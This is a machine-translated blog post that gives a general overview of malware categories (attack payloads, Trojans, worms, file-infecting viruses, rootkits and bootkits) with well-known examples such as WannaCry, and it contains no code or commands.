How much do you know about attack payloads, Trojan horses, worms, and infectious viruses?

Enterprise 2023-08-22 23:50:17 views: null

Malicious programs refer to program entities with attack intentions in the digital world, which can usually be divided into attack payloads, Trojan horses, worms, and infectious viruses.

1. Attack payload

The attack payload refers to the weapon carrier used by the attacker to initiate an initial attack and establish a network connection. According to the function, it can be divided into delivery attack type, connection control type, and independent attack type.

  • Delivery attacks include remote attack payloads, phishing emails, and malicious documents.

  • Connection control types include WebShell, Rebound Shell, Backdoor Trojan Horse (BackDoor), etc.

  • Independent attack types include standard shells such as SSH, RDP, and Telnet.

  • The goal of remote attack payloads is to implement remote network intrusion attacks and obtain the authority to execute commands on the system. The well-known "Eternal Blue" vulnerability is exploited in this way. Such loads are often small in size, and usually only perform a small amount of operations such as downloading after obtaining system permissions. If they do not need to be used as a springboard to further expand the results, such loads are generally presented in memory.

  • Phishing emails are another common delivery attack payload. The most common method is to post an attachment. If you are induced to open the document or program in the attachment, you may be planted with a backdoor Trojan horse. A more concealed method will combine browser vulnerabilities to carry out attacks. The email contains a URL or a picture with a link. If your browser has a vulnerability, it may be compromised after clicking the link. The most advanced phishing emails will use "nuclear weapons" such as mailbox software 0DAY or system pointer 0DAY to carry out attacks. As long as you open the email, you may be compromised without any operation.

  • Malicious documents are usually accompanied by phishing attacks. In addition to email phishing, attackers gradually tend to use chat tools to impersonate partners, recruit HR and other roles to carry out phishing attacks. The documents sent to you contain exploit codes.

  • WebShell is the most common connection control payload. After the attack is completed, if the target is a web application server, the attacker will place a PHP or JSP script that implements command and control in a suitable directory, and the operation of controlling and stealing information can be implemented through URL access.

  • Rebound Shell means that the compromised host actively connects to the attacker's server to implement the accused script load. It is usually written in scripts such as Bash, Telnet, Python, and PHP, and completes the system residency to implement persistent attacks.

  • The backdoor Trojan horse refers to the backdoor channel implanted by the attacker after the intrusion is completed. It is used for remote control and execution of commands. It has very powerful functions and can intercept screens, steal data, and destroy systems. ) key weapon.

  • Standard Shell refers to the attacks carried out by using remote services provided by software such as SSH, Telnet, RDP, and gray pigeon remote assistance, such as weak password attacks. Once the intrusion is successful, the remote services provided by the system can be used to implement control and command operations.

2. Trojan horse

Trojans are the most numerous type of malicious programs. Common Trojans include backdoor Trojans, online banking Trojans, account theft Trojans, homepage Trojans, advertising Trojans, extortion Trojans, and mining Trojans.

  • Backdoor Trojan horse: It refers to the backdoor channel implanted by the attacker after the intrusion, which is used for remote control and execution of commands. It is very powerful and can intercept screens, steal data, destroy systems, etc. attack) key weapon.

  • Internet banking Trojans: Internet banking Trojans mainly use two methods: one is to directly steal account numbers and passwords, and the other is to tamper with the account number and amount of money received during the payment process. With the strengthening of protective measures such as bank USB shields, security controls, and multi-factor authentication, online banking Trojans are rare in China.

  • Account hacking Trojans: The development of the Internet has enabled everyone to have many accounts. In the eyes of black industry, these accounts are of high value, especially chat accounts and online game accounts. Common methods of account hacking include keylogging, memory reading, and interface imitation.

  • Homepage Trojan horse: The navigation homepage of the browser is an important traffic entry point and an important source of income for many Internet companies. Driven by profit, Trojan horses that lock homepages have been popular to this day.

  • Advertising Trojan horse: Malicious bomb advertisement is another mainstream monetization mode of Trojan horse. In addition to Trojan horses, there are also many illegal software advertisements, especially shopping festivals such as 618 and Double 11, which have brought great harassment to the desktops of netizens. Some Trojan horses will also play some tricks, instead of actually popping up the window, they will display advertisements in the background instead, so as to deceive the advertiser's advertising fees.

  • Ransomware Trojans: Early ransomware Trojans would lock the system and ask for a ransom. Now they mainly encrypt files on computers (including servers), and provide decryption after paying the ransom. In recent years, digital currencies have developed rapidly. The anonymity of digital currency makes transactions difficult to trace, which objectively encourages the development of black production and cybercrime. At present, almost all ransomware Trojans use digital currency to pay the ransom.

  • Mining Trojans: Mining Trojans will not destroy files, but will quietly use the computing power of the CPU and graphics card in the background to mine valuable digital currency for the Trojan author, and the only thing the host can feel is that the computer is running slower up.

3. Worms

The biggest feature of worms is their ability to self-replicate and actively spread. According to different transmission methods, worms can be divided into network worms, mail worms, sharing worms, chat worms and so on.

  • Network worms: This type uses built-in penetration technology to automatically find vulnerable targets and complete attacks, and travels freely in the network world. The famous WannaCry is such a worm. The worm took advantage of the "Eternal Blue" leaked by the NSA (National Security Agency of the United States) and other vulnerabilities, swept the world in a short period of time, and spread ransomware Trojan horses, causing a serious shutdown of the economy and production. Once this kind of worm is released, it is like an open Pandora's box, which is difficult to control. The author of WannaCry added a "suicide" switch, otherwise the harm would be magnified several times.

  • Mail worm: This type of worm usually collects the mailbox list of the compromised system, and then uses its own mail engine to send virus mail to these mailboxes, further infecting and controlling more computers. With the application of big data mining technology in anti-spam, the living space of such worms is already very narrow.

  • Shared worms: This type of worm spreads by releasing the virus body to the shared directory, and usually needs to trick users into double-clicking to open it to run. However, the U disk worm will spread when opening the directory by setting the "autoplay" attribute. In addition, with the lnk (shortcut) vulnerability, it is theoretically possible to realize the ability to "poison at a glance" when opening a shared directory.

  • Chat worms: This type of worm spreads through chat tools, such as "QQ Tail" and "MSN Bookworm". Attackers will send some tempting content in chat software or chat rooms, with a virus link attached. With the management of the chat software joint security team, such worms have basically disappeared.

4. Infectious virus

An infectious virus is equivalent to the definition of a virus in a narrow sense, and its main feature is to infect and parasitize normal applications. When the program is running, the first thing to execute is the virus code, and then jump to execute the application code. Compared with Trojan horses and worms, infectious viruses are more skillful and difficult to write, and it is difficult to remove them with ordinary antivirus software.

Affected by the Internet Security Law and the "Panda Burning Incense" case, there have been no new infectious viruses in recent years. However, antique viruses (ramint, etc.) are still lurking in a certain corner of the network, and carry out a round of small-scale attacks from time to time.

5.Rootkit和Bootkit

Rootkit and Bootkit exist at the bottom of the system, theoretically, any modification and damage can be done to the operating system core.

  • Rootkit: Security software intercepts and kills viruses through active defense and powerful antivirus functions, and often has system permissions to gain an advantage in confrontation. The Rootkit virus obtains the same permissions as antivirus software by entering the system kernel (equivalent to obtaining Root permissions on a mobile phone), and then can hide (invisible), reinforce (cannot be killed), and destroy (anti-kill security software) and other actions, it is difficult to be cleared.

  • Bootkits. This is a higher-level attack technique than Rootkit. By infecting hardware such as the disk boot area (MBR, VBR), motherboard BIOS, etc., it can obtain an earlier boot opportunity than security software. With the public disclosure of this kind of code, Bootkit technology has been more and more applied to black products, and the more famous ones are the "Dark Cloud" series, "White Ghost" and "Hidden Soul".

For rootkits and bootkits, security software does not have many advantages in dealing with them. Therefore, the focus of defense should be to strengthen the interception of such threats during the entry or execution phase. In addition, such viruses are often spread through pirated systems, and can enter the system earlier than security software. Domestic first-class security vendors have added "special killing codes" to their housekeepers or guard products to remove them, and released "first aid" separately. Box" for a strong cleanup.

Guess you like

Origin blog.csdn.net/qq_32044265/article/details/131783646
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com